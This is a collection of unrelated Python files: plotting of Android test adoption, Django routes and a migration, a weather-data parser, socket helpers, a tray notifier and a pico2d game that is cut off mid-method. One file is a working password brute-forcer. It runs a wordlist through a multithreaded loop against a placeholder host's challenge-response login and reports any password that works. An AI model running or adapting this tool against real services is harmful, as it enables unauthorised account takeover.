tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm.pdf"))
ax.invert_xaxis()
figure.savefig(path_join(results_output, "tests_by_age_cumm_i.pdf"))
# ------------------------------------------------------------ #
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
    def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
                                                   title=None, verbose=False, **kwargs):
        """Second redefinition (shadows the previous one): same cumulative
        plot, but ages iterate in natural order and the x axis is not
        reversed.  Denominator is still len(df_projects).

        NOTE(review): the verbose branch references an undefined name
        `portion` and would raise NameError when verbose=True.
        """
        project_with_test_per_age = []
        total_projects_per_age = []
        n_projects_with_tests_history = []
        total_projects_history = []
        age_max = df_projects['age_numeric'].max()+1
        for age in range(age_max):
            n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
            n_projects_with_tests_history.append(n_projects_with_tests)
            total_projects = len(df_projects[df_projects['age_numeric']==age].index)
            total_projects_history.append(total_projects)
            project_with_test_per_age.append(n_projects_with_tests)
            total_projects_per_age.append(total_projects)
            if verbose:
                print("Age {}:".format(age))
                print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
        # Running (cumulative) sums along the age axis.
        project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
        total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
        portions = []
        for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
            if total > 0:
                # Share of the WHOLE population, not of projects seen so far.
                portions.append(with_tests/len(df_projects))
            else:
                portions.append(0)
        plt.plot(range(age_max), portions, **kwargs)
        # plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
        ax = plt.gca()
        ax.spines['right'].set_visible(False)
        ax.spines['top'].set_visible(False)
        ax.spines['left'].set_visible(False)
        ax.set_xticks(range(age_max))
        ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
        ax.set_ylabel("Percentage of projects")
        ax.yaxis.grid(linestyle='dotted', color='gray')
        ax.legend(loc='upper center', shadow=False)
        if title:
            ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm_2.pdf"))
# ------------------------------------------------------------ #
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
    def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
                                                   title=None, verbose=False, **kwargs):
        """Third redefinition (shadows the previous one): unlike the two
        variants above, the ratio divides by the CUMULATIVE project count
        per age (`total`), i.e. the share among projects seen so far.

        NOTE(review): the verbose branch references an undefined name
        `portion` and would raise NameError when verbose=True.
        """
        project_with_test_per_age = []
        total_projects_per_age = []
        n_projects_with_tests_history = []
        total_projects_history = []
        age_max = df_projects['age_numeric'].max()+1
        for age in range(age_max):
            n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
            n_projects_with_tests_history.append(n_projects_with_tests)
            total_projects = len(df_projects[df_projects['age_numeric']==age].index)
            total_projects_history.append(total_projects)
            project_with_test_per_age.append(n_projects_with_tests)
            total_projects_per_age.append(total_projects)
            if verbose:
                print("Age {}:".format(age))
                print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
        # Running (cumulative) sums along the age axis.
        project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
        total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
        portions = []
        for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
            if total > 0:
                # Share among projects counted so far (cumulative denominator).
                portions.append(with_tests/total)
            else:
                portions.append(0)
        plt.plot(range(age_max), portions, **kwargs)
        # plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
        ax = plt.gca()
        ax.spines['right'].set_visible(False)
        ax.spines['top'].set_visible(False)
        ax.spines['left'].set_visible(False)
        ax.set_xticks(range(age_max))
        ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
        ax.set_ylabel("Percentage of projects")
        ax.yaxis.grid(linestyle='dotted', color='gray')
        ax.legend(loc='upper center', shadow=False)
        if title:
            ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
cloud_test_services,
label="Cloud testing", color=colors_dict['cloud_test_services'], zorder=5,
marker=marker_dict['cloud_test_services'],
)
ax.set_xlabel("Years since first commit")
figure.tight_layout()
figure.savefig(path_join(results_output, "tests_by_age_cumm_3.pdf"))
ax.invert_xaxis()
figure.savefig(path_join(results_output, "tests_by_age_cumm_3_i.pdf"))
# ------------------------------------------------------------ #
def exit_gracefully(start_time):
    """Print the wall-clock time elapsed since *start_time* in blue."""
    elapsed = time.time() - start_time
    click.secho(
        "Reports generated in {:.4f} seconds.".format(elapsed),
        fg='blue'
    )
if __name__ == '__main__':
    start_time = time.time()
    try:
        reports()
    finally:
        # Always report elapsed time -- click commands typically exit via
        # SystemExit, which still runs this finally block.
        exit_gracefully(start_time)
|
import json
class Store:
    """
    A class used to represent a Store

    Attributes
    ----------
    name : str
        the name of the town or city where the store is located
    postcode : str
        the store's postcode
    """
    def __init__(self, name, postcode):
        self.name = name
        self.postcode = postcode

    def __repr__(self):
        # Added for debuggability; interface otherwise unchanged.
        return "Store(name={!r}, postcode={!r})".format(self.name, self.postcode)
# Static store data, loaded once at import time.
storesData = []
# NOTE(review): raises FileNotFoundError at import if the file is missing;
# the path is relative to the process working directory.
with open('./static/stores.json', 'r') as f:
    storesData = json.load(f)
def get_stores_data():
    """Return the static stores data (list of dicts) until/if a database is added."""
    return storesData
|
import argparse
import yaml
import os
from src.get_data import get_data,read_params
def load_and_save(config_path):
    """Load the raw dataset, normalize column names, and write it out.

    Reads the YAML config at *config_path*, fetches the data via
    get_data(), replaces spaces in column names with underscores, and
    writes the CSV to the config's load_data.raw_data_set path.
    """
    config = read_params(config_path)
    df = get_data(config_path)
    df.columns = [column.replace(' ', '_') for column in df.columns]
    raw_path = config['load_data']['raw_data_set']
    df.to_csv(raw_path, sep=',', index=False, header=True)
if __name__ == "__main__":
    # Fix: the ArgumentParser was constructed but never used; wire it up
    # so the config path can be overridden while keeping the old default
    # (running with no arguments behaves exactly as before).
    args = argparse.ArgumentParser()
    args.add_argument("--config", default=os.path.join("config", 'params.yaml'),
                      help="path to the params YAML file")
    parsed_args = args.parse_args()
    load_and_save(parsed_args.config)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-21 08:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: alter bookinfo.btitle to CharField(max_length=20)."""
    dependencies = [
        ('booktest', '0002_auto_20171121_0755'),
    ]
    operations = [
        migrations.AlterField(
            model_name='bookinfo',
            name='btitle',
            field=models.CharField(max_length=20),
        ),
    ]
|
# Read an employee's salary and show the new salary with a 15% raise.
salario = float(input('digite o salario: '))
novo_salario = salario * 1.15
print(f'o novo salario é {novo_salario}')
#-*- coding:utf-8 -*-
import os
import json
import requests
import webbrowser
import win32api
import win32con
import win32gui
def get_new_lecture():
    """Poll the CQUPT notice feed and return info for an unseen notice.

    Returns (title, time, lecture_id, dept_name) as UTF-8 bytes when the
    newest notice id is greater than the one cached in
    ../res/new_lecture_id.txt (the cache file is updated); otherwise
    returns None.  Network, parse, and file errors also yield None.

    Fix: narrowed `except BaseException` to `except Exception` so that
    KeyboardInterrupt / SystemExit are no longer swallowed.
    """
    try:
        user_agent = {'user-agent': 'Mozilla/5.0'}
        url = "http://www.cqupt.edu.cn/getPublicPage.do?ffmodel=notic&&nc_mode=news&page=1&rows=20"
        response = requests.get(url, headers=user_agent, timeout=10)
        response.raise_for_status()
        webdata = response.text.encode('utf-8')
        decodejson = json.loads(webdata)
        # Field values are kept as bytes to match the existing callers.
        newest = decodejson['rows'][0]
        lecture_id = newest['id'].encode('utf-8')
        title = newest['nc_title'].encode('utf-8')
        time = newest['puser_time'].encode('utf-8')
        dept_name = newest['dept_name'].encode('utf-8')
        with open("../res/new_lecture_id.txt", "rb") as f:
            old_lecture_id = f.read()
        if int(lecture_id) > int(old_lecture_id):
            with open("../res/new_lecture_id.txt", "wb") as f:
                f.write(lecture_id)
            return title, time, lecture_id, dept_name
    except Exception:
        return None
class Taskbar:
    """Win32 notification-area (system tray) icon with balloon toasts.

    Left-click opens the lecture's detail page in the browser,
    double-click ends the message loop, right-click is a no-op.
    """
    def __init__(self, title="Notification", msg="message", lecture_id=0, icon_path=None):
        # Toast title/body and the notice id opened on left click.
        self.title = title
        self.msg = msg
        self.lecture_id = lecture_id
        self.visible = 0
        # WM_USER+20 is the private callback message the tray icon posts.
        message_map = {
            win32con.WM_DESTROY: self.onDestroy,
            win32con.WM_USER + 20: self.onTaskbarNotify,
        }
        # Register the Window class.
        wc = win32gui.WNDCLASS()
        hinst = wc.hInstance = win32api.GetModuleHandle(None)
        wc.lpszClassName = "PythonTaskbarDemo"
        wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
        wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
        wc.hbrBackground = win32con.COLOR_WINDOW
        wc.lpfnWndProc = message_map # could also specify a wndproc.
        classAtom = win32gui.RegisterClass(wc)
        # Create the (never shown) window that owns the tray icon and
        # receives its callback messages.
        style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
        self.hwnd = win32gui.CreateWindow(
            classAtom,
            "Taskbar Demo",
            style,
            0,
            0,
            win32con.CW_USEDEFAULT,
            win32con.CW_USEDEFAULT,
            0,
            0,
            hinst,
            None)
        win32gui.UpdateWindow(self.hwnd)
        # icon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
        # self.setIcon(icon)
        # self.show()
        # NOTE(review): when icon_path is None the stock icon is loaded
        # here, but LoadImage below is still attempted with icon_path=None
        # and only the except-fallback restores the stock icon -- confirm.
        if icon_path is not None:
            icon_path = os.path.realpath(icon_path)
        else:
            hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
        icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
        try:
            hicon = win32gui.LoadImage(hinst, icon_path,
                                       win32con.IMAGE_ICON, 0, 0, icon_flags)
        except:
            hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
        self.setIcon(hicon)
        self.show()

    def setIcon(self, hicon, tooltip=None):
        # Remember the icon handle and optional tooltip used by show().
        self.hicon = hicon
        self.tooltip = tooltip

    def show(self):
        """Display the taskbar icon"""
        flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE
        if self.tooltip is not None:
            flags |= win32gui.NIF_TIP
            nid = (
                self.hwnd,
                0,
                flags,
                win32con.WM_USER +
                20,
                self.hicon,
                self.tooltip)
        else:
            nid = (self.hwnd, 0, flags, win32con.WM_USER + 20, self.hicon)
        # Re-adding an existing icon fails, so drop it first.
        if self.visible:
            self.hide()
        win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
        self.visible = 1

    def hide(self):
        """Hide the taskbar icon"""
        if self.visible:
            nid = (self.hwnd, 0)
            win32gui.Shell_NotifyIcon(win32gui.NIM_DELETE, nid)
            self.visible = 0

    def onDestroy(self, hwnd, msg, wparam, lparam):
        # Remove the tray icon, then end the message loop.
        self.hide()
        win32gui.PostQuitMessage(0) # Terminate the app.

    def onTaskbarNotify(self, hwnd, msg, wparam, lparam):
        # Dispatch tray mouse events delivered via WM_USER+20.
        if lparam == win32con.WM_LBUTTONUP:
            self.onClick()
        elif lparam == win32con.WM_LBUTTONDBLCLK:
            self.onDoubleClick()
        elif lparam == win32con.WM_RBUTTONUP:
            self.onRightClick()
        return 1

    def onClick(self):
        # Left click: open the lecture detail page.
        self.detail(self.lecture_id)

    def onDoubleClick(self):
        # Double click: quit the message loop.
        win32gui.PostQuitMessage(0)

    def onRightClick(self):
        # Right click: intentionally a no-op.
        pass

    def showToast(self):
        """Show a balloon notification (self.title / self.msg) on the icon."""
        flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_INFO
        nid = (
            self.hwnd,
            0,
            flags,
            win32con.WM_USER +
            20,
            self.hicon,
            "",
            self.msg,
            10,
            self.title
        )
        win32gui.Shell_NotifyIcon(win32gui.NIM_MODIFY, nid)

    def detail(self, lecture_id):
        # Open the full notice page for the given id in the default browser.
        morelink = 'http://www.cqupt.edu.cn/getPublicNotic.do?id=%s' % lecture_id
        webbrowser.open(morelink)
if __name__ == "__main__":
    result = get_new_lecture()
    if result is not None:
        # Unpack the bytes fields returned by get_new_lecture and show
        # a balloon toast for the new notice.
        title, time, lecture_id, dept_name = result
        t = Taskbar(title=time.decode('utf-8'),
                    msg=title.decode('utf-8'),
                    lecture_id=lecture_id,
                    icon_path="../img/python.ico")
        t.showToast()
        # Block here dispatching window messages until PostQuitMessage.
        win32gui.PumpMessages()
    else:
        pass
|
import string
import datetime
import pandas as pd
import numpy as np
import os
import re
def path_generator(year, month, place, amedas_root):
    """Return the AMeDAS CSV path for a given year, month, and station.

    year - 1990 and the month are each encoded as a single character
    from the sequence 0-9 then A-Z, as required by the archive's file
    naming scheme.  The half-year directory suffix is "1" for Jan-Jun
    and "2" for Jul-Dec.
    """
    code_chars = "0123456789" + string.ascii_uppercase
    fmt = "{year}_{1or2}/AM10{year_2:02d}{month_2:02d}/A{year_1}{month_1}{place:05d}.CSV"
    param = {
        "year": year,
        "year_2": year % 100,
        "1or2": "1" if month <= 6 else "2",
        "month_2": month,
        "year_1": code_chars[year - 1990],
        "month_1": code_chars[month],
        "place": place,
    }
    return os.path.join(amedas_root, fmt.format(**param))
def month_converter(year, month, place, amedas_root):
    """Parse one month of 10-minute AMeDAS observations into a DataFrame.

    The raw file is organised in 145-line day blocks: one index line
    followed by 144 ten-minute records.  Returns columns: datetime,
    precipitation, temparature, wind_direction, wind_speed, sunshine.
    """
    DATAPATH = path_generator(year, month, place, amedas_root)
    with open(DATAPATH, "r") as f:
        data = f.readlines()
    df = pd.DataFrame([],
                      columns=["datetime", "precipitation", "temparature", "wind_direction", "wind_speed",
                               "sunshine", ])
    for i in range(len(data) // 145):
        idx = data[145 * i]
        # Field 1 of the day's index line is the record type; '4' is expected.
        if idx.strip().split(",")[1] == '4':
            # Fields 1..5 of each record line are the five measurements.
            raw = [datum.strip().split(",")[1:6] for datum in data[145 * i + 1:145 * i + 145]]
            temp_df = pd.DataFrame(raw,
                                   columns=["precipitation", "temparature", "wind_direction", "wind_speed", "sunshine"])
            param = {"year": year, "month": month, "day": i + 1}
            # Timestamps mark the END of each 10-minute interval (+10 min shift).
            temp_df["datetime"] = pd.date_range("{year}-{month:02d}-{day:02d} 00:00".format(**param),
                                                "{year}-{month:02d}-{day:02d} 23:50".format(**param),
                                                freq="10T") + datetime.timedelta(minutes=10)
            df = pd.concat([df, temp_df])
        else:
            print("Formatting Error, datatype = {}".format(idx.strip().split(",")[1]))
            # NOTE(review): bare `raise` with no active exception raises
            # RuntimeError rather than a descriptive error -- confirm intent.
            raise
    return df
def line_parser(line):
    """Parse one AMeDAS station-index line.

    Returns [code, name, kana, abbreviation, latitude, longitude,
    altitude] where latitude/longitude are the first 5 and next 6
    digits of the coordinate field.  Raises AttributeError when the
    line does not match the expected layout.
    """
    idxpattern = re.compile(
        r"^(?P<code>[0-9]{5})(?P<name>[ぁ-んァ-ン一-龥ヶ]+) *(?P<kana>[^\s]+)\s*(?P<abb>[^\s]+)\s*(?P<cor>[0-9]{10,11})\s*(?P<alt>[\-0-9]+)")
    match = idxpattern.match(line)
    coords = match.group("cor")
    return [
        match.group("code"),
        match.group("name"),
        match.group("kana"),
        match.group("abb"),
        coords[0:5],
        coords[5:11],
        match.group("alt"),
    ]
def get_place_code(year, month, cityname, amedasdir):
    """Look up the AMeDAS station code for *cityname* in the index files.

    Searches ``idxYYYY.MM`` then ``sidxYYYY.MM`` under the half-year
    directory for (year, month).  Returns the station code as int, or -1
    when the city is not found (or found but unparseable).
    """
    fmt = "{year}_{1or2}/"
    param = {
        "year": year,
        # First half of the year (Jan-Jun) lives in "_1", the rest in "_2".
        "1or2": "1" if month <= 6 else "2",
    }
    dirname = os.path.join(amedasdir, fmt.format(**param), "idx")
    path1 = os.path.join(dirname, "idx{year}.{month:02d}".format(year=year, month=month))
    path2 = os.path.join(dirname, "sidx{year}.{month:02d}".format(year=year, month=month))
    found_flag = 0
    for path in [path1, path2]:
        # Index files are Shift-JIS (cp932) encoded.
        with open(path, encoding="cp932") as f:
            data = f.readlines()
        for datum in data:
            idx = datum.find(cityname)
            if idx != -1:
                found_flag = 1
                break
        if found_flag == 1:
            # Stop before printing "not found" for the file that matched.
            break
        print("not found in {}".format(path))
    if found_flag == 0:
        print("{year}_{month}_{cityname} not found".format(year=year, month=month, cityname=cityname))
        ret = -1
    else:
        # Parse every line of the file that contained the city and find the
        # exact-name match via a DataFrame lookup.
        parsed_data = []
        for datum in data:
            try:
                datum = line_parser(datum)
                parsed_data.append(datum)
            except AttributeError:
                # line_parser returns None-match -> .group raised AttributeError.
                print("WARNING:Parse error in the following line")
                print(datum)
        df = pd.DataFrame(parsed_data, columns=["code", "city", "kana", "abb", "latitude", "longitude", "altitude"])
        ret = df.loc[df["city"] == cityname, "code"]
        if len(ret) > 0:
            ret = ret.iloc[0]
        else:
            ret = -1
    return int(ret)
|
from django.urls import path

from user_account.views import signin_view, signup_view

# URL namespace for the user_account app (reverse as "user:login" etc.).
app_name = 'user'

urlpatterns = [
    path('login/', signin_view, name='login'),
    path('signup/', signup_view, name='register'),
]
import socket
import sys
def CreateConnect(host, port, server=False):
    """Create a TCP socket and either bind it (server) or connect it (client).

    Parameters
    ----------
    host : str
        Hostname or IP address to bind/connect to.
    port : int
        TCP port in normal host byte order.
    server : bool
        When True, bind the socket to (host, port); otherwise resolve the
        host with getaddrinfo and connect to it.

    Returns
    -------
    socket.socket
        The bound or connected socket.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if server:
        # BUG FIX: the original passed the port through socket.htons() before
        # bind/connect; Python's socket API already expects host byte order,
        # so that silently byte-swapped the port number.
        s.bind((host, port))
    else:
        addrinfo = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
        family, socktype, proto, canonname, sockaddr = addrinfo[0]
        ip, port = sockaddr
        s.connect((ip, port))
    return s
def SendMessage(sock, message):
    """Send *message* followed by a '\\n' delimiter over *sock*.

    The payload is UTF-8 encoded first -- on Python 3, ``sendall`` requires
    bytes and the original str argument raised TypeError.  On a socket
    error the process prints a notice and exits.
    """
    data = (str(message) + '\n').encode('utf-8')
    try:
        sock.sendall(data)  # Send the whole string
    except socket.error:
        print('Message failed to send')  # Send failed
        sys.exit()
# readlines function from Dr.Fyre's sumPython example
# pulled from https://synack.me/blog/using-python-tcp-sockets
# retrieved 11/15/2020
# renamed to RecvMessage for group use
def RecvMessage(sock, recv_buffer=4096, delim='\n'):
    """Yield delimiter-terminated lines received on *sock*.

    Generator: reads up to *recv_buffer* bytes at a time, decodes them as
    UTF-8, and yields each complete line (without the delimiter) until the
    peer closes the connection.
    """
    buffer = ''
    data = True
    while data:
        data = sock.recv(recv_buffer)
        # BUG FIX: recv() returns bytes on Python 3 -- decode before
        # concatenating with the str buffer (the old ``buffer += data``
        # raised TypeError).
        buffer += data.decode('utf-8')
        while buffer.find(delim) != -1:
            # BUG FIX: split on the configured delimiter; the original
            # hard-coded '\n' and ignored the ``delim`` parameter.
            line, buffer = buffer.split(delim, 1)
            yield line
    return
def ClientClose(sock):
    """Tell the peer we are done (send 'BYE') and close the socket."""
    SendMessage(sock, 'BYE')
    sock.close()
|
# Description
# Brute-forces the password of a given username, using a wordlist
# Parameters
# Parameter 1: Username
# Parameter 2: Wordlist
# Additional
# Replace [Host] with the host
import sys
import requests
import hashlib
import signal
import json
from collections import namedtuple
from os import system
import re
from multiprocessing.dummy import Pool
def signal_handler(signal, frame):
    """SIGINT handler: announce shutdown and exit cleanly (status 0)."""
    # Typo fix: "Quiting" -> "Quitting".
    print('Quitting')
    sys.exit(0)
def login(loginID, password, getCookie = False):
    """Attempt a challenge-response login for *loginID* with *password*.

    Returns True/False for success, or the initial session cookies when
    *getCookie* is True.  Network errors retry (recurse) indefinitely.
    """
    #get challenge
    try:
        r = requests.get('https://[Host]/Services/Security.asmx/InitializeLogin?loginid=%s' % loginID)
    except requests.exceptions.RequestException:
        return login(loginID, password, getCookie)
    s = r.content
    # Extract the JSON object embedded in the response body.
    s = s[s.index('{'):s.index('}') + 1]
    x = json.loads(s, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))
    #hash password with challenge
    hash_dig = password
    try:
        for i in range(0, x.iterations):
            hash_dig = hashlib.sha256(hash_dig + x.salt + password).hexdigest()
        hash_dig = hashlib.sha256(hash_dig + x.challenge).hexdigest()
    except Exception:
        print("[!] Error on loginID %s" % loginID)
        return False
    try:
        # BUG FIX: the response used to be stored in a local named ``login``,
        # shadowing this function -- the retry in the except branch then hit
        # UnboundLocalError instead of recursing.
        resp = requests.get('https://[Host]/Services/Security.asmx/Login?response=%s' % hash_dig, cookies=r.cookies)
    except requests.exceptions.RequestException:
        return login(loginID, password, getCookie)
    if getCookie:
        return r.cookies
    return "true" in resp.content
def loginThread(password):
    # Worker run by the thread pool: try one candidate password for the
    # username given on the command line (sys.argv[1]).
    username = sys.argv[1]
    if login(username, password):
        print '[+] {0} with password {1} \n'.format(username, password),
        # NOTE(review): ``exitPls`` is undefined -- this raises NameError,
        # apparently on purpose, to abort the worker before exit(1);
        # confirm that killing the thread this way is intended.
        exitPls
        exit(1)
# Entry point: load candidate passwords from the wordlist (argv[2]) and try
# them against the username (argv[1]) with 10 concurrent workers.
print "[*] Trying the passwords from {0} on the user {1}".format(str(sys.argv[2]), str(sys.argv[1]))
passwords = [line.rstrip('\n') for line in open(str(sys.argv[2]))]
# Install the Ctrl-C handler so a keyboard interrupt exits cleanly.
signal.signal(signal.SIGINT, signal_handler)
pool = Pool(10)  # 10 worker threads (multiprocessing.dummy is a thread pool)
asyncres = pool.map(loginThread, passwords)
pool.close()
pool.join()
|
from django.conf.urls import patterns, url
# Core app URL routes.
# NOTE(review): ``patterns()`` and string view references were deprecated in
# Django 1.8 and removed in 1.10 -- this module only runs on older Django.
urlpatterns = patterns('',
    url(r'^$', 'intent.apps.core.views.home', name='home'),
    url(r'^login/$', 'django.contrib.auth.views.login',
        {'template_name': 'core/login.html'}, name='login'),
    url(r'^register/$', 'intent.apps.core.views.register', name='register'),
    url(r'^logout/$', 'intent.apps.core.views.logout_user', name='logout'),
    url(r'^plans/$', 'intent.apps.core.views.plans', name='plans'),
    url(r'^terms/$', 'intent.apps.core.views.terms', name='terms'),
    url(r'^technology/$', 'intent.apps.core.views.technology', name='technology'),
    url(r'^privacy/$', 'intent.apps.core.views.privacy', name='privacy'),
    url(r'^company/$', 'intent.apps.core.views.company', name='company'),
)
|
import random
import json
import os
from pico2d import *
import GameWin
import game_framework
import title_state
import GameOver
import Sound_Manager
# Identifier of this game state (used by game_framework when switching states).
name = "MainState2"
class Field:
    """One 50x50 floor tile; state 1 = fire (blocked), state 0 = walkable road."""
    # Class-level sentinel and shared textures: loaded once for all tiles.
    img = None
    image1 = None
    image2 = None

    def __init__(self, x, y, state):
        self.x = x
        self.y = y
        self.state = state
        # BUG FIX: ``Field.img`` was checked but never assigned, so every one
        # of the 196 tiles reloaded both textures; mark it after first load.
        if Field.img is None:
            Field.image1 = load_image('Graphics\\Fire_map.png')
            Field.image2 = load_image('Graphics\\Road_2.png')
            Field.img = True

    def draw(self):
        # state 1 draws the fire tile, anything else the road tile.
        if self.state == 1:
            self.image1.draw(self.x, self.y)
        else:
            self.image2.draw(self.x, self.y)

    def Change(self, state):  # Change the state of this floor tile.
        self.state = state

    def ReturnState(self):
        return self.state
class Home:
    """The base the player defends; drained by attacking monsters in range."""
    hpimage1 = None  # shared HP-bar fill texture
    hpimage2 = None  # shared HP-bar background texture
    image = None     # shared home sprite
    def __init__(self):
        self.hp = 1000
        self.x = 650
        self.y = 400
        if Home.hpimage1 == None:
            Home.hpimage1 = load_image ('Graphics\\healthStatusBar.png')
            Home.hpimage2 = load_image ('Graphics\\healthStatusBar1.png')
        if Home.image == None:
            Home.image = load_image('Graphics\\home.PNG')
    def update(self):
        # Take 5 damage from every live monster mid-attack (attackframe>7)
        # within 50px; uses the module-global monsterSet set up in enter().
        for M in monsterSet:
            if M.attack==True and M.attackframe>7 and math.sqrt((M.x-self.x)*(M.x-self.x)+(M.y-self.y)*(M.y-self.y))<50 and M.death==False:
                self.hp-=5
        # Out of HP -> game over state.
        if self.hp<0:
            game_framework.change_state(GameOver)
    def draw(self):
        # HP bar (fill width scaled to hp/10 pixels) above the home sprite.
        self.hpimage2.draw (self.x, self.y + 100, 100, 20)
        self.hpimage1.draw (self.x + (100 - self.hp / 10) / 2, self.y + 100, self.hp / 10, 20)
        self.image.draw(self.x,self.y,150,150)
class Monster:
    """Enemy that walks the road toward the home, melee-attacking it and the player."""
    image = None
    attackImage =None
    # Sprite-sheet row per movement direction.
    RIGHT_RUN,UP_RUN, DOWN_RUN = 1,0,3
    def __init__(self,state):
        # ``state`` selects the monster tier (0/1/2) -> HP and sprites below.
        self.hp = 0
        self.state = state
        self.damage = 3
        self.attack = False
        self.frame = 0
        self.attackframe=0
        self.attackspeed = 10
        self.speed = 100
        self.framespeed=10
        self.x,self.y =25,275  # spawn point at the left end of the road
        self.death= False
        self.dir =0
        self.bloodtime=0       # drives the blood fade-out after death
        self.bloodspeed = 10
        self.movestate = self.RIGHT_RUN
        if self.state == 0:
            self.hp = 100
            self.image=load_image('Graphics\\pig.png')
            self.attackImage = load_image('Graphics\\Monster_attack2.png')
        elif self.state == 1:
            self.hp = 150
            self.image =load_image('Graphics\\trash.png')
            self.attackImage = load_image('Graphics\\Monster_attack1.png')
        elif self.state == 2:
            self.hp = 200
            self.image =load_image('Graphics\\nohead.png')
            self.attackImage = load_image('Graphics\\Monster_attack.png')
    def update(self,frame_time):
        if self.death==False:
            # Bomb skill (skillstate 1): 50 damage once its animation passes frame 6.
            if character.skillstate == 1 and character.skillGo == True and math.sqrt((character.m_x-self.x)*(character.m_x-self.x)+(character.m_y-self.y)*(character.m_y-self.y))<100\
                    and character.skillframe>6:
                self.hp -= 50
            # Ice field (skillstate 2): slows the monster and weakens its damage.
            if character.skillstate == 2 and character.skillGo == True and math.sqrt((character.m_x-self.x)*(character.m_x-self.x)+(character.m_y-self.y)*(character.m_y-self.y))<100:
                self.speed = 50
                self.damage = 1
            else:
                self.speed = 100
                self.damage = 5
            if(self.attack==True):
                self.attackframe += self.attackspeed*frame_time
                if (self.attackframe > 10):
                    self.attackframe = 0
                    self.attack = False
            # Attack whenever within 50px of the player or the home.
            if math.sqrt((self.x-character.x)*(self.x-character.x)+(self.y-character.y)*(self.y-character.y))<50 or \
                    math.sqrt((self.x-home.x)*(self.x-home.x)+(self.y-home.y)*(self.y-home.y))<50:
                self.attack=True
            else:
                self.attack=False
            if self.attack==False:
                self.frame = (self.frame + self.framespeed*frame_time) % 4
                # Move along the current direction.
                if(self.movestate==self.RIGHT_RUN):
                    self.x+=self.speed*frame_time
                if(self.movestate==self.UP_RUN):
                    self.y+=self.speed*frame_time
                if(self.movestate==self.DOWN_RUN):
                    self.y-=self.speed*frame_time
                # Follow the road: turn when the tile ahead is fire (state 1).
                if(self.movestate==self.RIGHT_RUN and FieldSet[int((self.x-25)/50)+1][int((self.y-25)/50)].state==1):
                    if(FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==1):
                        self.movestate = self.DOWN_RUN
                    elif(FieldSet[int((self.x-25)/50)][int((self.y-25)/50)-1].state==1):
                        self.movestate = self.UP_RUN
                elif(self.movestate==self.DOWN_RUN and FieldSet[int((self.x-25)/50)][int((self.y-25)/50)-1].state==1):
                    self.movestate = self.RIGHT_RUN
